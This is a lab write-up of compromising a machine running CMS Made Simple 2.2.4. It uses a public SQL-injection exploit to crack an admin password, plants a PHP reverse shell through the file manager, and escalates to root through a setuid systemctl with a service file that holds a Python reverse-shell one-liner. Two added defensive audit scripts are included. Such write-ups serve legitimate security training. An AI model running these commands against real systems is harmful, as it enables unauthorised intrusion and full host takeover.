# Simple

## nmap

```
mkdir nmap
sudo rustscan -a 172.31.1.2 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan   
```

A web server is open on port 80.

<div align="left"><img src="/files/-MjBbDRFgSXlrpykvlLI" alt=""></div>

## Web enumeration

The footer shows it is running CMS Made Simple v2.2.4.

<div align="left"><img src="/files/-MjBbPH2f39Rgw_h6cZw" alt=""></div>

Since it's a web server, I'll run directory busting:

```
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://172.31.1.2/FUZZ  -ignore-body -recursion -recursion-depth 2 -t 40 -ic -c -o webdir.domain.root -D -e php,html,txt
```

After running for a while, it found `/admin`, which looks interesting. I tried logging in with default credentials, but nothing worked.

<div align="left"><img src="/files/-MjBcSE9NmGWE7EA6d-O" alt=""></div>

Since we have the version, let's check it with searchsploit. It turns out this version of CMS Made Simple is vulnerable to SQL injection.

<div align="left"><img src="/files/-MjBclwFL-SYyIfDUFGw" alt=""></div>

## Exploitation

I run the script with the following parameters:

```
python 46635.py -u http://172.31.1.2/ --crack -w /opt/wordlist/rockyou.txt   
```

After running for a while, we get the following information:

```
[+] Salt for password found: 18207a2929431d9f
[+] Username found: david
[+] Email found: david@simple.csl
[+] Password found: bbeabbca0fff4e851f840ffad0680dcf
[+] Password cracked: punisher
```

Log in with these credentials on `/admin`.

![](/files/-MjBokQusn986NkYnm2d)

Go to Content > File Manager; we will upload a reverse shell here.

<div align="left"><img src="/files/-MjBozjE_HT8IUUrUxdL" alt=""></div>

Create your own PHP reverse shell; in this example I will use this awesome shell: <https://github.com/ivan-sincek/php-reverse-shell>

Rename your shell to `<shellname>.txt` and upload it.

<div align="left"><img src="/files/-MjBp_Fgs2GtjTZPGKzC" alt=""></div>

Now we need to give our shell a `.php` extension. To do that, create a copy of the uploaded file and name it with a `.php` extension. Make sure your target directory is `/uploads`.

<div align="left"><img src="/files/-MjBpmLm_qft_MbWj-Ji" alt=""></div>

We have now successfully uploaded our reverse shell.

<div align="left"><img src="/files/-MjBq0iA9D5nd6nXktGm" alt=""></div>

Set up a netcat listener and visit `/uploads/shellname.php`. You should receive your shell right away.

<div align="left"><img src="/files/-MjBqhiCOJcrz-9UL7on" alt=""></div>
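From the defender's side, the chain above works because the file manager accepts a `.txt` upload and then lets it be copied to a `.php` name inside a web-served directory, so an extension-only check never sees the problem. The script below is an added example and is not part of the original writeup or of CMS Made Simple: it scans an upload directory for files whose content contains a PHP open tag, whatever extension they carry. The function names, the directory and the sample files are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not part of the original writeup): find files in an upload
# directory that contain PHP code, regardless of the extension they carry.
# The directory, file names and contents below are constructed for the demo.

# find_php_uploads DIR
# Prints the path of every regular file under DIR whose content contains a
# PHP open tag ("<?php" or the short "<?=" form), one per line, sorted.
find_php_uploads() {
    find "$1" -type f -print0 2>/dev/null \
        | xargs -0 grep -lE '<\?(php|=)' 2>/dev/null \
        | sort
}

# make_sample_uploads DIR
# Builds a constructed upload directory that mirrors the writeup's situation:
# a PHP file uploaded under a .txt name, its .php copy, and two harmless files.
make_sample_uploads() {
    mkdir -p "$1"
    printf '<?php echo "constructed sample"; ?>\n' > "$1/shell.txt"
    cp "$1/shell.txt" "$1/shell.php"
    printf 'just a note\n' > "$1/readme.txt"
    printf 'GIF89a not really an image\n' > "$1/photo.gif"
}

# Stand-alone demo: build the sample directory, scan it, clean up.
SAMPLE="${TMPDIR:-/tmp}/uploads-demo.$$"
make_sample_uploads "$SAMPLE"
echo "Files under $SAMPLE that contain PHP code:"
find_php_uploads "$SAMPLE"
rm -rf "$SAMPLE"
```

Run it against the real upload directory (for example `find_php_uploads /var/www/html/uploads`) from cron or a file-integrity job; the `.txt` copy is reported just like the `.php` one, which is the point. The complementary fix is in the web server configuration: disable script execution for the upload directory so that even a file that slips through is served as plain text rather than run.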

## Privilege Escalation

Let's transfer `linpeas.sh` to the target machine.

<div align="left"><img src="/files/-MjC0QFM-05SQOIc1I6Q" alt=""></div>

Transfer the bash script with `wget`.

<div align="left"><img src="/files/-MjC0_3Km33D3Oqr8npY" alt=""></div>

Run `linpeas.sh`.

<div align="left"><img src="/files/-MjC0iqLtfOhMC43gq-P" alt=""></div>

The binary `systemctl` has the `suid` flag set; we can use this to gain a root shell.

<div align="left"><img src="/files/-MjC1-ZpnQ7SS8I0lfe1" alt=""></div>
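A setuid `systemctl` is not something a stock distribution ships, so it is the kind of finding a periodic audit should catch long before linpeas does. The script below is an added example, not part of the original writeup or of linpeas: it lists setuid executables under a tree and flags every one whose name is not in an expected baseline. The function names, the sample tree and the baseline file are constructed for the demonstration; on a real host the baseline would come from a known-good image or the package manifests.

```shell
#!/bin/sh
# Added example (not part of the original writeup): list setuid executables
# under a directory tree and flag those that are not in an expected baseline.
# The sample tree, file names and baseline below are constructed for the demo.

# audit_suid ROOT BASELINE
# ROOT is the tree to scan, BASELINE a file with one expected setuid program
# name per line. Prints one "UNEXPECTED setuid: <path>" line per offender.
audit_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort | while read -r path; do
        name=$(basename "$path")
        # -x: the whole line must equal the name, so "ls" does not match "tools"
        if ! grep -qx -- "$name" "$2"; then
            echo "UNEXPECTED setuid: $path"
        fi
    done
}

# make_sample_tree ROOT
# Constructed /usr/bin lookalike: passwd and sudo are expected setuid binaries,
# systemctl carries setuid as in the writeup, ls is a normal binary.
make_sample_tree() {
    mkdir -p "$1/usr/bin"
    for prog in passwd sudo systemctl ls; do
        printf '#!/bin/sh\nexit 0\n' > "$1/usr/bin/$prog"
        chmod 755 "$1/usr/bin/$prog"
    done
    chmod u+s "$1/usr/bin/passwd" "$1/usr/bin/sudo" "$1/usr/bin/systemctl"
    printf 'passwd\nsudo\n' > "$1/baseline.txt"
}

# Stand-alone demo: build the sample tree, audit it, clean up.
ROOT="${TMPDIR:-/tmp}/suid-demo.$$"
make_sample_tree "$ROOT"
audit_suid "$ROOT" "$ROOT/baseline.txt"
rm -rf "$ROOT"
```

On a live system you would call it as `audit_suid / /etc/suid-baseline.txt` and alert on any output; `find -perm -4000` matches files with the setuid bit whatever their other permission bits are, which is the same test linpeas runs from the other side.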

Create `shell.service` in any writable folder with the following content, editing the IP address and port accordingly.

```
[Service]
Type=oneshot
ExecStart=/bin/sh -c "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.0.41\",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
[Install]
WantedBy=multi-user.target
```

Create a symlink to the file you have created.

<div align="left"><img src="/files/-MjC1tTUVBeJbTiOrMnV" alt=""></div>

Set up a netcat listener, and run the following command to trigger the exploit:

```
systemctl start shell.service
```

Sweet, now you're root! :D

<div align="left"><img src="/files/-MjC2pmmgQ7wrYp0cm-Y" alt=""></div>

